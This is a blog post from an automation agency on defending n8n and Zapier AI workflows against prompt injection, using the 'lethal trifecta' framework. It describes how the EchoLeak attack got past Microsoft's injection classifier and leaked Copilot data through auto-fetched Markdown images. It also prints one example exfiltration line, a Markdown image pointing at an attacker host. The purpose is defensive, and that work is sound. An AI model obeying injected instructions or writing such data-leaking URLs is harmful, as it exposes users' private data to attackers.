What is the lethal trifecta in AI security?

It is a structural pattern, named by Simon Willison in June 2025, where an AI system has three capabilities at once: it reads content that could come from an attacker, it can access private data or tools, and it can send data out of the system. Any AI step with all three is exploitable by prompt injection, because an attacker can plant instructions in the untrusted content that make the model fetch private data and ship it out. The defense is to make sure no single step holds all three legs.

Can input sanitization stop prompt injection?

Not reliably. Prompt injection is a natural-language attack, not a syntax attack, so there is no character set to escape the way you escape SQL. Microsoft built a dedicated classifier (XPIA) to catch injected instructions in Copilot, and the EchoLeak attack got past it with wording designed to look like an ordinary email. Filtering raises the bar for casual attempts but is not a control you can bet customer data on. Design the flow so injection has nothing to steal even if it succeeds.

How do I make an n8n or Zapier AI workflow safe from prompt injection?

Separate the step that reads untrusted content from the step that has tools or can send. Let a toolless model read the message and return only structured fields or one label from a fixed list, then let a deterministic rule act on that clean output. The model that touches attacker-controlled text should have no API keys, no database write access, and no ability to choose who an outbound message goes to. That removes two of the three legs by design.

Is retrieved or RAG content a prompt injection risk?

Yes. OWASP classifies hidden instructions in retrieved documents, web pages, and emails as indirect prompt injection, and treats it the same as direct user input. If your automation summarizes a scraped page, a PDF a vendor sent, or a knowledge-base article that anyone can edit, that text is untrusted content. A document does not become safe just because it came from your own vector store.

Prompt injection in AI automations: the real fix

Q: Does a constrained output schema help against prompt injection?

It helps, because it narrows what a hijacked model can do. If the step can only return one value from a fixed enum like urgent, normal, or spam, a successful injection cannot smuggle your customer list out through that field. Constrained outputs (OpenAI Structured Outputs, Anthropic tool use) close the send leg on classify-and-extract steps. They do not protect a step that generates free text or that holds tools, so use them alongside the structural separation, not instead of it.

You cannot sanitize your way out of prompt injection. In June 2025, a single crafted email pulled data out of Microsoft 365 Copilot in a zero-click attack named EchoLeak (CVE-2025-32711, rated CVSS 9.3), and it did that by slipping past Microsoft's own purpose-built prompt-injection classifier. If a dedicated filter from a company that size can be bypassed by an email worded to look ordinary, the "add a detection node" advice in most n8n and Zapier security tutorials will not hold either. The durable fix is not a better filter. It is structural: design your automation so that no single AI step ever has all three of the things an attacker needs at the same time.

Those three things have a name. Simon Willison, the engineer who formalized prompt injection, calls them the lethal trifecta: access to private data, exposure to untrusted content, and the ability to communicate externally. Hold all three in one step and you are exploitable by design. Hold only two and the attack has nowhere to go.

Why filtering does not stop prompt injection

Prompt injection is not a syntax bug. With SQL injection you escape quotes, because the dangerous characters are a finite, known set. Prompt injection is a natural-language attack, and there is no character to escape. The model reads your system prompt, the user's input, retrieved documents, and tool results as one merged stream of text, and when those signals conflict it has to guess which to obey. OWASP ranks this as LLM01, the number one risk in its 2025 list for LLM applications, and states the core reason plainly: models cannot currently tell trusted instructions apart from untrusted content.

EchoLeak is the proof that filtering is a soft control. Microsoft runs a classifier called XPIA (Cross Prompt Injection Attempt) specifically to catch injected instructions inside Copilot's context. The attack got past it by phrasing the hidden instructions to read like a normal message to a human, then chained a few more bypasses to move data out. No user clicked anything. The lesson for anyone building automations is not "Microsoft was careless." It is the opposite. They had a dedicated filter and a security team, and the structural exposure still beat the filter. Treat detection as a speed bump, not a wall.

The lethal trifecta, translated to a no-code flow

Strip the security-conference language and the three legs map cleanly onto an n8n, Make, or Zapier flow.

Untrusted content is any text your automation reads that an outsider could have written. An inbound support email, a website chat message, a web page you scrape, a PDF a vendor sent, a form's free-text field, a review you pulled in. If a stranger can put words in front of your model, that is the leg.

Private data or tools is anything the step can reach that you would not want published. A CRM lookup, an order database, an API key, a "send email" action, a calendar, a file store. In practice this leg arrives the moment you give a model tools, which is exactly the runtime tool-choice question behind whether you need an MCP server. The more tools a model can call, the heavier this leg.

The ability to send data out is any path by which information can leave. The obvious ones are an email send, an HTTP request, a Slack post. The non-obvious one, which catches people, is the model's own output landing somewhere that renders links or images. More on that below, because it is the leg operators forget they have.

Which of your automations already have all three legs

Here are seven patterns operators actually build, scored on each leg. The ones with all three are not hypothetically risky. They are the EchoLeak shape.

Automation	Reads untrusted content	Has private data or tools	Can send data out	All three
AI auto-replies to inbound support email	Yes, the email	Yes, CRM and order lookup	Yes, sends the reply	Yes
AI booking agent in a website chat	Yes, visitor messages	Yes, calendar and CRM	Yes, confirmation and booking	Yes
AI research agent browses the web, emails you a digest	Yes, web pages	Yes, your context and tools	Yes, the email	Yes
AI summarizes an inbound email into a Slack channel	Yes, the email	Limited, just that email	Yes, posts to Slack	In disguise, see below
AI tags inbound messages into a fixed label set	Yes, the message	No tools, no secrets	No, writes one enum value	No, one leg
AI extracts fields from a vendor PDF into your database	Yes, the PDF	Writes to your DB only	No external send	No, two contained legs
AI drafts outbound copy from your own internal docs	No, your own data	Yes	Yes, you send	No, missing the untrusted leg

The top three rows are the canonical full-trifecta builds, and the booking agent is worth calling out because it is so common. A chat agent that reads visitor messages, holds calendar and CRM tools, and sends confirmations is the textbook case, which is also why the named failure modes in the appointment-booking chatbot teardown matter for security and not just reliability.

The Slack-summary row is the trap. It looks like two legs, because the model only sees one email and has no CRM. But "posts to Slack" is an outbound channel, and if that channel auto-renders links or images written by the model, the third leg is live and you did not notice it.

Cut the cheapest leg: the fix per pattern

You do not need to defeat prompt injection. You need to remove one leg, and one leg is almost always cheap to remove without changing what the automation does for the user. Pick the cheapest.

Leg to cut	How you cut it	When it is cheapest
Untrusted content	Pre-extract with a toolless model into structured fields, then pass only the fields to any step that has tools. The tool-holding step never sees raw attacker text.	When the downstream step only needs a few values, not the full message.
Private data and tools	Give the step that reads untrusted content zero tools, no API keys, no DB writes. It returns text or a label only. A separate deterministic step acts.	Almost always. This is the default that should have been the default.
Send capability	The untrusted-reading step cannot trigger an outbound action with a model-chosen destination. Hardcode the recipient, or route through a human gate.	When the outbound destination is fixed (always the same Slack channel, always the customer who wrote in).

Two specifics make this concrete. First, constrain the output. If the step that reads the message can only return one value from an enum like urgent, normal, or spam, a hijacked model cannot encode your customer list into that field. Constrained outputs (OpenAI Structured Outputs, Anthropic tool use) close the send leg on any classify-or-extract step, which is the same reason to push the model early and narrow in the AI-versus-rule decision. The model reads the mess and picks from your list. The rule does everything after.

Second, never let the model choose the recipient or the URL of a send action. If the automation emails a reply, the "to" address comes from the verified inbound sender record, not from anything the model wrote. If it posts a webhook, the endpoint is a hardcoded value in the node, not a field the model can fill. The moment a model picks where data goes, you have handed the attacker the steering wheel. For the cases where an outbound action is genuinely high-stakes and reversible-only-by-apology, that send belongs behind a human-approval gate rather than firing unattended.

The exfiltration channel operators forget

EchoLeak did not move data out through an obvious "send" tool. It used reference-style Markdown and auto-fetched images, encoding the stolen data into a URL that the rendering surface fetched automatically, routed through a Microsoft Teams proxy that the content security policy already trusted. The data left because a display surface auto-loaded an image the model had written.

This is the leg that the Slack-summary automation has and you did not count. Your AI output lands in Slack, Notion, a Telegram bot, an email client, an internal dashboard. If any of those auto-renders an image or follows a link the model produced, the model can place stolen data inside that URL and the render fires the request. No "send email" node required. The output surface is the send leg.

Two defenses. Strip or escape Markdown links and images from model output before it lands anywhere that auto-renders, so a model-written ![](http://attacker/?data=...) becomes inert text. And treat retrieved and scraped content as untrusted at the same level as direct user input, because OWASP's indirect-injection category is exactly the hidden instruction sitting inside a document your flow happened to read. A page in your own vector store is not safe because it is yours. It is safe only if you trust everyone who can write to it.

What to do next

Open your most exposed automation, the one that reads something a stranger wrote and can act on it, and score it on the three legs out loud. Does an AI step read untrusted content. Does that same step have tools or secrets. Can that same step cause data to leave, including through a surface that auto-renders its output. If you count three, you have an EchoLeak-shaped flow, and the fix is not a filter. Split the step. Let a toolless model read the untrusted text and return a constrained label or a few clean fields, then let a deterministic rule with a hardcoded destination do the acting.

We build workflow automation systems and the AI agents and assistants we ship on this separation by default: the model that touches anything a stranger wrote never also holds the keys and the outbound channel. If you want a second set of eyes on a flow that reads inbound mail, chats, or scraped content, send us the flow and we will mark where the three legs meet and which one is cheapest to cut.

Prompt injection in AI automations: the real fix

Why filtering does not stop prompt injection

The lethal trifecta, translated to a no-code flow

Which of your automations already have all three legs

Cut the cheapest leg: the fix per pattern

The exfiltration channel operators forget

What to do next

Frequently Asked Questions

SOURCES & CITATIONS

About Alexey Yushkin

Related reading

Automation logs hold more PII than your database

When should an automation use AI instead of a rule?

When should an automation require human approval?

Want this kind of system in your business?